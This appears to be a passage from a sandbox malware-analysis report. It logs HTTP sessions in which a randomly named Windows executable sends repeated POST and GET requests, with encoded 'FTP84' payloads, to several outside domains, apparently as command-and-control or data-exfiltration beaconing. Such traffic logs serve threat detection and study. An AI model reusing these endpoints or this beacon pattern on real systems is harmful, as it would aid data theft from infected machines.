                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 218
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.foryourhealth19.com
                                                  Referer: http://www.foryourhealth19.com/ym7q/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Ascii: FTP84=Zzxl2CcNcJg6BFdQpfm6LLfh3VSTT2kiiiPlYS0ZmQQh1MorXHdf+UjasVGcZBk1r7L+1+tKzSRWH4imB1WGxGm8IT67sr/1A+AAoaatOglLs4oFL1V4LmccK2slRLF5jn2lSe0pY+GfdMa1SlbSEf1gb4Sh10nbyBYdCFH7SLhYaUSz9vDZagJmrXXeDco/5+ufmCmAUHxycVL4Jw==
Jul 1, 2024 19:24:08.160142899 CEST | 879 | IN | HTTP/1.1 404 Not Found
                                                  Date: Mon, 01 Jul 2024 17:24:08 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                  Expires: Mon, 01 Jul 2024 17:24:08 GMT
                                                  Vary: Accept-Encoding
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T%2Bymy%2F47YGKLuptjPc%2FFtTMCiL0eKvE%2FXL5LAyiNqSylVIdQ75P1qZj%2Fn2%2FuMx8L%2FyZakR5RNjWL1ayG5NGMsnmZuQ13AszDw2N3jmPLkeVcQZ2wVqFf5dq%2B%2BOjOTFjxateKfBbP5zEklg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 89c8167d49c43342-EWR
                                                  Content-Encoding: gzip
                                                  alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 64457 | 172.67.194.145 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
Timestamp | Bytes transferred | Direction | Data
Jul 1, 2024 19:24:10.023534060 CEST | 757 | OUT | POST /ym7q/ HTTP/1.1
                                                  Host: www.foryourhealth19.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 238
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.foryourhealth19.com
                                                  Referer: http://www.foryourhealth19.com/ym7q/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Ascii: FTP84=Zzxl2CcNcJg6AltQr/a6e7fg0VSTGGkmiiDlYXVGnmAh2tYrWGdfz0jak1GZExkyr7HM1/RKzStWH5+mUW+ZzWm6Tj6lx7/1A+AAoaOHOg9LsIYFLUV7V2cfamslVLEwjn29SfpGY9ufdJ+1Sw3ROf1iGITG4HXU0jInIEPFL7dPWCPRnNP1ExxdvVzoU61K7/qHrgShLwUYRHq8fNt79bnxo7eNASlqTVBdLzs=
Jul 1, 2024 19:24:10.762649059 CEST | 875 | IN | HTTP/1.1 404 Not Found
                                                  Date: Mon, 01 Jul 2024 17:24:10 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                  Expires: Mon, 01 Jul 2024 17:24:10 GMT
                                                  Vary: Accept-Encoding
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EwCJnTv%2BJ2biJChg1%2FB6iIHYzJ348OvD9GWQ1GQCOOGCaZ6dMPc5i%2FbooNLIBx4Dp%2BDBT%2FWK1fCZhWkEGZUG9Y4bzJ2TxVjW41YdaqQMaVpqB69hi4z0d2R2hvV%2FwfDVPZ%2FnV5IalID3xg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 89c8168d9de61861-EWR
                                                  Content-Encoding: gzip
                                                  alt-svc: h3=":443"; ma=86400
                                                  Jul 1, 2024 19:24:10.763577938 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  3 | 192.168.2.7 | 64458 | 172.67.194.145 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:24:12.554569006 CEST | 1770 | OUT | POST /ym7q/ HTTP/1.1
                                                  Host: www.foryourhealth19.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 1250
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.foryourhealth19.com
                                                  Referer: http://www.foryourhealth19.com/ym7q/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Jul 1, 2024 19:24:13.251588106 CEST | 871 | IN | HTTP/1.1 404 Not Found
                                                  Date: Mon, 01 Jul 2024 17:24:13 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                  Expires: Mon, 01 Jul 2024 17:24:13 GMT
                                                  Vary: Accept-Encoding
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FUWgQue1Wm10I2%2FTLrJbffBvm2P1%2BOCfmfZZKEyzgoWO4hPpLK5uA%2BIYJkt1N2U3McWZDjvv0r4VKG6i8MOVXYKa%2Br1KQn4HjtRUducmDTMxTD791UEuQFAvqRe4Ke%2BweDYlIMIsdElXUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 89c8169d1c67c323-EWR
                                                  Content-Encoding: gzip
                                                  alt-svc: h3=":443"; ma=86400


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  4 | 192.168.2.7 | 64459 | 172.67.194.145 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:24:15.086308002 CEST | 462 | OUT | GET /ym7q/?Lb=GFtlIrHx8T50&FTP84=UxZF11kgGMhVJ3h1mYaBYZj5xwuySTV9/R2JXFp47AYwysMhWE1l+EvBnUyCPTtksKPA2Ite2ltCL7XTNGD56H2fTiCax6/BQq0vjYK7AyFfq6kTJWJKbnRCSHQhd4Mpl36RQO9kaMTf HTTP/1.1
                                                  Host: www.foryourhealth19.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Jul 1, 2024 19:24:15.787378073 CEST | 871 | IN | HTTP/1.1 404 Not Found
                                                  Date: Mon, 01 Jul 2024 17:24:15 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                  Expires: Mon, 01 Jul 2024 17:24:15 GMT
                                                  Vary: Accept-Encoding
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hIrZnvP848ss291UZKTCSye2pq7CFXqXPQ3nvJk9XoSkPw%2BdrfA7E6Hqw%2B90U0pfYlwibpFcomNac5WkjrGcmo5kFHunZxgsd%2Fs2F8%2B%2BqC64YzV7sL7309FaAQQVt%2B0%2BWtOKpF6JGvRFdw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 89c816acecfc3300-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  Data Ascii: 93<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>
                                                  Jul 1, 2024 19:24:15.787462950 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                  5 | 192.168.2.7 | 64460 | 38.55.194.30 | 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:24:29.472742081 CEST | 710 | OUT | POST /80eg/ HTTP/1.1
                                                  Host: www.86wqi.cyou
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 218
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.86wqi.cyou
                                                  Referer: http://www.86wqi.cyou/80eg/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Ascii: FTP84=yi894NG9mvjhcuscGzD3BbxjqM7bhMhDjfdYdfSDswPErMshIcWGANkkJsQcCxO3OVEko3QDkwUHrVGCIm9VC3z4hXPRF0HK9kXesjRPIyZWQ93Ch46i7s73vR1oO58zfwpnY2Ee8PipL2Y7NgYBqtksEf1ZjkljHbBWoiVG/4PWXgP9q0MwoTt5HVoi2FyaonQulcRaxRPZvNSXIQ==


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  6 | 192.168.2.7 | 64461 | 38.55.194.30 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:24:32.010243893 CEST | 730 | OUT | POST /80eg/ HTTP/1.1
                                                  Host: www.86wqi.cyou
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 238
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.86wqi.cyou
                                                  Referer: http://www.86wqi.cyou/80eg/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Ascii: FTP84=yi894NG9mvjhTu8cVEv3VLxkhs7boshHjehYdarGsjnEys8hPdWGFNkkCMQTfBOCOVBTo2cDkwQHrU2CIWBWEnz2u3PpLUHK9kXesnxpIyhWQtnCgZ6jzM74mx1oK58/fwpFYyM08KupL0Q7MxYAktkQav0Pn1VsIb9PlUgalY/Rf2SfwWAc2CVCDXMUhjvvqmU2o+l7umqzifzTelZpMTzmdKbvcre+gYiUcSk=


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  7 | 192.168.2.7 | 64462 | 38.55.194.30 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:24:34.636476994 CEST | 1743 | OUT | POST /80eg/ HTTP/1.1
                                                  Host: www.86wqi.cyou
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 1250
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.86wqi.cyou
                                                  Referer: http://www.86wqi.cyou/80eg/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  8 | 192.168.2.7 | 64463 | 38.55.194.30 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:24:37.172413111 CEST | 453 | OUT | GET /80eg/?Lb=GFtlIrHx8T50&FTP84=/gUd74TM946IZLQfFCjFFoMEh/bZ058Y5fxYbd7lsAuEu+8WJ/21FtYOGJlKUg3YeQ1lkwlhlDEwsFjwCVkjP3HgvWH+eFvT+Cr55kx1O3kSIIeygKzK78qTqiVgNqoEH3t5dFc0+pi4 HTTP/1.1
                                                  Host: www.86wqi.cyou
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  9 | 192.168.2.7 | 64464 | 46.30.215.51 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:25:03.784488916 CEST | 740 | OUT | POST /e5cg/ HTTP/1.1
                                                  Host: www.vivaepicmarbella.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 218
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.vivaepicmarbella.com
                                                  Referer: http://www.vivaepicmarbella.com/e5cg/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Ascii: FTP84=zg5vSOyHEBsRoTF2tLKhuFhUdFFb45gPhWGKZlUav4IS3ixyqiYy8WSEdwjTk3Sz7oArMGmZrOcX0ESjdNx4MmYnc70LZbQG5338FseBw2v8fiyE5zmhH/04ga7+vaBNcZlvCqITPqcMHR07qcawF80BPD7rk98hLSE1puFnewCAm9I7UJaRvu+4O5RTRJuZdPom3HyMSBdqDJsVBQ==
                                                  Jul 1, 2024 19:25:04.413290977 CEST | 453 | IN | HTTP/1.1 404 Not Found
                                                  Date: Mon, 01 Jul 2024 17:25:04 GMT
                                                  Server: Apache
                                                  Content-Length: 196
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  X-Onecom-Cluster-Name:
                                                  X-Varnish: 18455855971
                                                  Age: 0
                                                  Via: 1.1 webcache2 (Varnish/trunk)
                                                  Connection: close
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  10 | 192.168.2.7 | 64465 | 46.30.215.51 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:25:06.538366079 CEST | 760 | OUT | POST /e5cg/ HTTP/1.1
                                                  Host: www.vivaepicmarbella.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 238
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.vivaepicmarbella.com
                                                  Referer: http://www.vivaepicmarbella.com/e5cg/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Ascii: FTP84=zg5vSOyHEBsRpzZ2hMehlFhTB1FbxZgLhWKKZkQKuKsS3H1y4TYyvmSEFAjKg3S47o8jMDGZrOIX0FCjc6l3eGYlVb0NELQG5338FsLsw2H8fyiE4WGgE/07na7+5qBJcZlBCrE5PokMHUY7qtavcM0LCj7+s8spGik9w8xtXC/iqrVZOrW9x/GDK71lGvzsfOs+6lGtN24AObNRXofxMIQqc4ECF6tBz7e8gcg=
                                                  Jul 1, 2024 19:25:07.172175884 CEST | 453 | IN | HTTP/1.1 404 Not Found
                                                  Date: Mon, 01 Jul 2024 17:25:07 GMT
                                                  Server: Apache
                                                  Content-Length: 196
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  X-Onecom-Cluster-Name:
                                                  X-Varnish: 18437441792
                                                  Age: 0
                                                  Via: 1.1 webcache2 (Varnish/trunk)
                                                  Connection: close
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  11 | 192.168.2.7 | 64466 | 46.30.215.51 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:25:09.076472044 CEST | 1773 | OUT | POST /e5cg/ HTTP/1.1
                                                  Host: www.vivaepicmarbella.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 1250
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.vivaepicmarbella.com
                                                  Referer: http://www.vivaepicmarbella.com/e5cg/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Jul 1, 2024 19:25:09.798964977 CEST | 453 | IN | HTTP/1.1 404 Not Found
                                                  Date: Mon, 01 Jul 2024 17:25:09 GMT
                                                  Server: Apache
                                                  Content-Length: 196
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  X-Onecom-Cluster-Name:
                                                  X-Varnish: 18289636085
                                                  Age: 0
                                                  Via: 1.1 webcache2 (Varnish/trunk)
                                                  Connection: close
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  12 | 192.168.2.7 | 64467 | 46.30.215.51 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:25:11.804732084 CEST | 463 | OUT | GET /e5cg/?FTP84=+iRPR6b0cHsvtSIKktiBhFksQ3J0g8xQjEPnQEYx5YYVoEZd7QcDm2acLw7Tj1bPoKM8M2uZ1cEL1EuWaogQQhFlafU2EKFDhhDWP+Lh20TqHHOR+DrFC95KlJHLt9tMC+FdDZkSCqct&Lb=GFtlIrHx8T50 HTTP/1.1
                                                  Host: www.vivaepicmarbella.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Jul 1, 2024 19:25:12.455271006 CEST | 453 | IN | HTTP/1.1 404 Not Found
                                                  Date: Mon, 01 Jul 2024 17:25:12 GMT
                                                  Server: Apache
                                                  Content-Length: 196
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  X-Onecom-Cluster-Name:
                                                  X-Varnish: 18204808545
                                                  Age: 0
                                                  Via: 1.1 webcache2 (Varnish/trunk)
                                                  Connection: close
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  13 | 192.168.2.7 | 64468 | 74.208.236.162 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:25:17.499043941 CEST | 725 | OUT | POST /u4jq/ HTTP/1.1
                                                  Host: www.lookstudiov.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 218
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.lookstudiov.com
                                                  Referer: http://www.lookstudiov.com/u4jq/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Ascii: FTP84=PBh0+f1c/yrbfO/48VNwdYQNecAln2mcvz5cml+LsmLh2RTB6Dl9CYmP1ij12L9xo+WLl18Xp85K+7YeqkEggzv4WVtq3rQ45ldVy9lKfgaIHc/Tm37REON5TCeULZQR9PLKUuOqoRYZ4ROQelgvwnjfBc8ce3g6dMXbY4zcFAIlcqQFnOoebCTRAixbigmc8EI/IimPiJtGwgo5gg==
                                                  Jul 1, 2024 19:25:18.313036919 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Date: Mon, 01 Jul 2024 17:25:17 GMT
                                                  Server: Apache
                                                  X-Powered-By: PHP/8.2.20
                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                  Link: <http://lookstudiov.com/wp-json/>; rel="https://api.w.org/"
                                                  Content-Encoding: gzip


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  14 | 192.168.2.7 | 64469 | 74.208.236.162 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:25:20.040369034 CEST | 745 | OUT | POST /u4jq/ HTTP/1.1
                                                  Host: www.lookstudiov.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 238
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.lookstudiov.com
                                                  Referer: http://www.lookstudiov.com/u4jq/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Ascii: FTP84=PBh0+f1c/yrbevv46CZwa4R/bcAltWmYvz9cmmy9tUvh203B5Cl9BYmP9Cjw4r9vo+qDl0sXp89K+7oeqTYjhjvmDFt06LQ45ldVy9gdfk+IGsPTnSPSY+N6UCeUPZQV9PL4UrWAoTgZ4UyQewV5pXjjNM9dTFJYbM/EB53ebiYRU8Nn9skyFTrqEgVt1G7p+FMnFASu9+Is9yJ92YhznA9T9AAq0bCWzbxsQQ4=
                                                  Jul 1, 2024 19:25:20.869039059 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Date: Mon, 01 Jul 2024 17:25:20 GMT
                                                  Server: Apache
                                                  X-Powered-By: PHP/8.2.20
                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                  Link: <http://lookstudiov.com/wp-json/>; rel="https://api.w.org/"
                                                  Content-Encoding: gzip


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  15 | 192.168.2.7 | 64470 | 74.208.236.162 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:25:22.578505993 CEST | 1758 | OUT | POST /u4jq/ HTTP/1.1
                                                  Host: www.lookstudiov.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 1250
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.lookstudiov.com
                                                  Referer: http://www.lookstudiov.com/u4jq/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Jul 1, 2024 19:25:23.369860888 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Date: Mon, 01 Jul 2024 17:25:23 GMT
                                                  Server: Apache
                                                  X-Powered-By: PHP/8.2.20
                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                  Link: <http://lookstudiov.com/wp-json/>; rel="https://api.w.org/"
                                                  Content-Encoding: gzip


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  16 | 192.168.2.7 | 64471 | 74.208.236.162 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:25:25.124460936 CEST | 458 | OUT | GET /u4jq/?Lb=GFtlIrHx8T50&FTP84=CDJU9pFFzFP5Q+XwrjtzU7ALaZIX7Qr7xG0Tk3i+702mxinN9hpFEu+s7zPr8ql7seaWvhcu7+p+54MBjhZ2jhTmPmJLv4ka4ysGmOJ/DhiKAPXXpWbDV/sLTxWyGr8frfPdUs+6sgZH HTTP/1.1
                                                  Host: www.lookstudiov.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Jul 1, 2024 19:25:25.770205021 CEST | 527 | IN | HTTP/1.1 301 Moved Permanently
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Date: Mon, 01 Jul 2024 17:25:25 GMT
                                                  Server: Apache
                                                  X-Powered-By: PHP/8.2.20
                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                  X-Redirect-By: WordPress
